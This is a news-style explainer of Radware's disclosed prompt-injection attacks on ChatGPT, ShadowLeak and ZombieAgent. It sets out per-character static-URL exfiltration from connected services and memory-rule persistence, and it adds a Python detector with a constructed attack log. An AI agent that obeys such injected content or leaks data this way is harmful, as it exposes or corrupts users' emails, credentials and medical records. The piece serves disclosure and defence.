TL;DR

Researchers at Radware disclosed multiple prompt-injection vulnerabilities in ChatGPT that let models leak or alter sensitive data. OpenAI implemented patches in September and again in December, but Radware says attackers can still bypass those defenses using techniques that exfiltrate data character-by-character and abuse the agent memory feature.

What happened

Security vendor Radware reported in a bug filing that it discovered prompt-injection vulnerabilities affecting the ChatGPT components used to access external content and services. An earlier flaw, disclosed in September as ShadowLeak, exploited the model's difficulty distinguishing system instructions from untrusted input and allowed dynamic URL-based exfiltration from connected services such as email and cloud storage. OpenAI restricted the model's ability to modify URLs, but Radware describes a follow-up technique called "ZombieAgent" that sidesteps that defense by using many static URLs, each ending in a different character, to leak data one character at a time. The researchers also demonstrated persistence by manipulating the assistant's memory: an attacker-supplied rule could instruct the model to read attacker content from memory on each user message and leak stored secrets, or to alter saved medical history so the model returns incorrect advice. Radware says OpenAI patched these issues in December; OpenAI did not respond to a request for comment.
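From a defender's side, the one-character-at-a-time variant described above has a recognisable footprint in egress logs: a single agent session fetching a burst of URLs that are identical except for their final path character. The following detector is an added example, not code from Radware, OpenAI or the original article; the log format, the session identifiers and the hostnames (`cdn.example-attacker.test`, `mail.example.test`, `docs.example.test`) are constructed for illustration, and the threshold and window are assumptions to be tuned per deployment.

```python
"""Flag character-at-a-time URL exfiltration in agent egress logs.

Added example, not Radware's or OpenAI's code. The log format is constructed:
one line per outbound fetch made on behalf of an agent session, written as
"<ISO timestamp> <session_id> GET <url>".
"""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed sample log. Session s1 fetches a run of URLs that differ only in
# their last path character (the pattern the article describes); session s2
# is ordinary connector traffic that happens to touch adjacent resource ids.
SAMPLE_LOG = """\
2025-12-01T10:00:00Z s1 GET https://cdn.example-attacker.test/px/s
2025-12-01T10:00:01Z s1 GET https://cdn.example-attacker.test/px/e
2025-12-01T10:00:01Z s1 GET https://cdn.example-attacker.test/px/c
2025-12-01T10:00:02Z s1 GET https://cdn.example-attacker.test/px/r
2025-12-01T10:00:02Z s1 GET https://cdn.example-attacker.test/px/e
2025-12-01T10:00:03Z s1 GET https://cdn.example-attacker.test/px/t
2025-12-01T10:00:03Z s1 GET https://docs.example.test/policy.pdf
2025-12-01T10:00:04Z s2 GET https://mail.example.test/api/messages?limit=20
2025-12-01T10:00:05Z s2 GET https://mail.example.test/api/messages/17
2025-12-01T10:00:06Z s2 GET https://mail.example.test/api/messages/18
"""

THRESHOLD = 5                   # assumed: fetches sharing a stem before alerting
WINDOW = timedelta(seconds=60)  # assumed: look-back window per session


def parse_log(text):
    """Yield (timestamp, session, url) tuples from the constructed log format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, session, _method, url = line.split(maxsplit=3)
        yield datetime.fromisoformat(ts.replace("Z", "+00:00")), session, url


def split_stem(url):
    """Return (stem, last_char): the URL without its final path character,
    plus that character. The query string is dropped so that ?noise=1 on a
    repeated path cannot hide the pattern."""
    parts = urlsplit(url)
    path = parts.path or "/"
    stem = f"{parts.scheme}://{parts.netloc}{path[:-1]}"
    return stem, path[-1]


def find_char_exfil(log_text, threshold=THRESHOLD, window=WINDOW):
    """Return one alert per (session, stem) that accumulates at least
    `threshold` fetches inside `window`; the alert carries the final
    characters in log order, which is what an incident responder would
    reconstruct to see what left the environment."""
    by_key = defaultdict(list)
    for ts, session, url in parse_log(log_text):
        stem, ch = split_stem(url)
        by_key[(session, stem)].append((ts, ch))

    alerts = []
    for (session, stem), hits in by_key.items():
        hits.sort(key=lambda h: h[0])  # stable sort keeps log order for equal timestamps
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({
                    "session": session,
                    "stem": stem,
                    "count": len(hits),
                    "leaked": "".join(ch for _, ch in hits),
                })
                break
    return alerts


if __name__ == "__main__":
    for a in find_char_exfil(SAMPLE_LOG):
        print(f"ALERT session={a['session']} stem={a['stem']} "
              f"fetches={a['count']} leaked={a['leaked']!r}")
```

The threshold is what keeps legitimate connector traffic quiet: `s2` reads two adjacent message ids, which also differ only in their last character, but two fetches never reach the bar. In a real deployment the same logic belongs at the egress proxy or tool-call gateway, where the URLs can be blocked rather than merely logged, ideally behind an exact-match allowlist of destinations the agent is permitted to fetch.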

Why it matters

  • The flaws show how agents can be tricked into executing attacker instructions embedded in otherwise benign content.
  • Data exfiltration can occur from services linked to AI assistants, exposing emails, files or credentials.
  • Memory abuse creates persistence and the potential for ongoing unauthorized actions or corrupted user data.
  • Enterprises relying on such agents may lack visibility into how cloud-hosted models process untrusted inputs, increasing risk.

Key facts

  • Radware filed a bug report on September 26, 2025; fixes were applied by OpenAI on December 16, 2025, according to Radware.
  • ShadowLeak was a September vulnerability that relied on models treating attacker instructions inside content as executable guidance.
  • OpenAI’s initial fix blocked the model from dynamically appending parameters to URLs.
  • ZombieAgent circumvents that fix by using a set of static, preconstructed URLs that each correspond to a single character, enabling one-character-at-a-time exfiltration.
  • Radware showed that the attack can persist by abusing ChatGPT’s memory functionality to store and later read attacker instructions and stolen data.
  • Researchers illustrated potential harms beyond theft, including altering stored medical history so the assistant might produce incorrect guidance.
  • Radware named individual researchers involved in the analysis, including Zvika Babo and Pascal Geenens.
  • OpenAI did not respond to Radware’s disclosure request, according to the report.

What to watch next

  • Whether OpenAI issues additional technical mitigations specifically targeting static-URL exfiltration and memory-based attacks (not confirmed in the source).
  • Any public reports of these techniques being exploited in the wild or observed against enterprise deployments (not confirmed in the source).

Quick glossary

  • Prompt injection: A technique where malicious instructions are embedded in input given to a model, causing it to follow those instructions rather than the intended behavior.
  • Exfiltration: The unauthorized transfer of data from a system to an attacker-controlled destination.
  • Connector: A link between an AI assistant and an external service (like email or cloud storage) that lets the model access user content.
  • Agent memory: Persistent storage used by an AI assistant to remember user-provided information across sessions or to store rules affecting future behavior.

Reader FAQ

What were the named vulnerabilities?
Radware described an earlier issue called ShadowLeak and a follow-up technique they call ZombieAgent.

Did OpenAI fix these issues?
Radware says OpenAI implemented fixes in September and again in December; details about further actions were not provided by OpenAI in the report.

Was user data stolen in the wild?
Not confirmed in the source.

Did OpenAI respond to the disclosure?
According to the report, OpenAI did not respond to a request for comment.

Sources

  • "OpenAI putting bandaids on bandaids as prompt injection problems keep festering" (Research), Thomas Claburn, Thu 8 Jan 2026, 11:01 UTC. Excerpt: "Security researchers at Radware say they've identified several vulnerabilities in…"
